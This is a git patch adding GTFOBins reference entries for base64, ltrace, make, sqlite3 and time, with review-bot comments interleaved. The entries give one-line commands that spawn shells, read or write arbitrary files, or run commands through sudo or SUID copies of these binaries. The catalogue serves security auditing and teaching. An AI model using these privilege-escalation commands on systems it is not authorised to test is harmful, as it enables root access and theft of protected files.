From 5fa7efbc1c23b11b8c5bc811357a5bd830eafa99 Mon Sep 17 00:00:00 2001
From: Dov Murik
Date: Mon, 4 Jun 2018 10:21:53 +0000
Subject: [PATCH] Add base64, ltrace, make, sqlite3, time
---
_gtfobins/base64.md | 15 +++++++++++++++
_gtfobins/ltrace.md | 7 +++++++
_gtfobins/make.md | 23 +++++++++++++++++++++++
_gtfobins/sqlite3.md | 27 +++++++++++++++++++++++++++
_gtfobins/time.md | 12 ++++++++++++
5 files changed, 84 insertions(+)
create mode 100644 _gtfobins/base64.md
create mode 100644 _gtfobins/ltrace.md
create mode 100644 _gtfobins/make.md
create mode 100644 _gtfobins/sqlite3.md
create mode 100644 _gtfobins/time.md
diff --git a/_gtfobins/base64.md b/_gtfobins/base64.md
new file mode 100644
index 0000000..02e4f62
--- /dev/null
+++ b/_gtfobins/base64.md
@@ -0,0 +1,15 @@
+---
+functions:
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_read
+ sudo base64 "$LFILE" | base64 -d
+ suid-enabled:
+ - code: |
+ LFILE=file_to_read
+ ./base64 "$LFILE" | base64 -d
+ file-read:
+ - code: |
+ LFILE=file_to_read
+ base64 "$LFILE" | base64 -d
+---
diff --git a/_gtfobins/ltrace.md b/_gtfobins/ltrace.md
new file mode 100644
index 0000000..f7b420b
--- /dev/null
+++ b/_gtfobins/ltrace.md
@@ -0,0 +1,7 @@
+---
+functions:
+ execute-interactive:
+ - code: ltrace -b -L /bin/sh
+ sudo-enabled:
+ - code: sudo ltrace -b -L /bin/sh
+---
diff --git a/_gtfobins/make.md b/_gtfobins/make.md
new file mode 100644
index 0000000..fb38728
--- /dev/null
+++ b/_gtfobins/make.md
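Review bot: In `_gtfobins/ltrace.md` the flags `-b -L` appear in both entries with no explanation, so a reader auditing a sudoers rule that permits `ltrace` cannot tell whether they are essential to the behaviour shown. Going by the ltrace manual they only silence signal and library-call output, which is worth a front-matter line such as `description: The -b and -L options only suppress ltrace's own trace output.` `time.md` in this same patch already carries a `description:` block, so adding one here also keeps the entries consistent.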
@@ -0,0 +1,23 @@
+---
+functions:
+ execute-interactive:
+ - code: |
+ COMMAND='/bin/sh 1>&2'
+ make -s --eval="a := \$(info \$(shell $COMMAND))" --eval='all:'
+ execute-non-interactive:
+ - code: |
+ COMMAND=/usr/bin/id
+ make -s --eval="a := \$(info \$(shell $COMMAND))" --eval='all:'
+ sudo-enabled:
+ - code: |
+ COMMAND=/usr/bin/id
+ sudo make -s --eval="a := \$(info \$(shell $COMMAND))" --eval='all:'
+ suid-enabled:
+ - code: |
+ COMMAND=/usr/bin/id
+ ./make -s --eval="a := \$(info \$(shell $COMMAND))" --eval='all:'
+ file-write:
+ - code: |
+ LFILE=file_to_write
+ make -s --eval="a := \$(file >$LFILE,data)" --eval='all:'
+---
diff --git a/_gtfobins/sqlite3.md b/_gtfobins/sqlite3.md
new file mode 100644
index 0000000..6fa89ae
--- /dev/null
+++ b/_gtfobins/sqlite3.md
@@ -0,0 +1,27 @@
+---
+functions:
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_read
+ sudo sqlite3 << EOF
+ CREATE TABLE t(line TEXT);
+ .import $LFILE t
+ SELECT * FROM t;
+ EOF
+ suid-enabled:
+ - code: |
+ LFILE=file_to_read
+ ./sqlite3 << EOF
+ CREATE TABLE t(line TEXT);
+ .import $LFILE t
+ SELECT * FROM t;
+ EOF
+ file-read:
+ - code: |
+ LFILE=file_to_read
+ sqlite3 << EOF
+ CREATE TABLE t(line TEXT);
+ .import $LFILE t
+ SELECT * FROM t;
+ EOF
+---
diff --git a/_gtfobins/time.md b/_gtfobins/time.md
new file mode 100644
index 0000000..7530795
--- /dev/null
+++ b/_gtfobins/time.md
@@ -0,0 +1,12 @@
+---
+description: |
+ Note that the shell might have its own builtin time implementation, which may
+ behave differently than /usr/bin/time.
+functions:
+ execute-interactive:
+ - code: /usr/bin/time /bin/sh
+ sudo-enabled:
+ - code: sudo /usr/bin/time /bin/sh
+ suid-enabled:
+ - code: ./time /bin/sh -p
+---
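Review bot: `_gtfobins/make.md` has no `description:` stating that every listed command depends on GNU make. The `--eval` option is only available from GNU make 3.82 and the `$(file ...)` function used under `file-write` from 4.0, and other make implementations accept neither. Someone reviewing a sudo rule or SUID bit on `make` needs that context to know which builds the listed commands apply to. A line such as `description: Requires GNU make; --eval needs 3.82 or later and $(file ...) needs 4.0 or later.` would cover it.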
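Review bot: The three entries in `_gtfobins/sqlite3.md` present `.import $LFILE t` followed by `SELECT * FROM t;` as a file read, but `.import` parses the file as delimited records rather than copying it, so the output is not a faithful copy. With the default `|` separator and a one-column table, any line containing `|` is split and, depending on the sqlite3 version, truncated or rejected. The heredoc delimiter is also unquoted, so `$LFILE` is expanded by the shell and a path containing whitespace will not reach `.import` as a single argument. I would add a `description:` saying the read is line-oriented and lossy for such input.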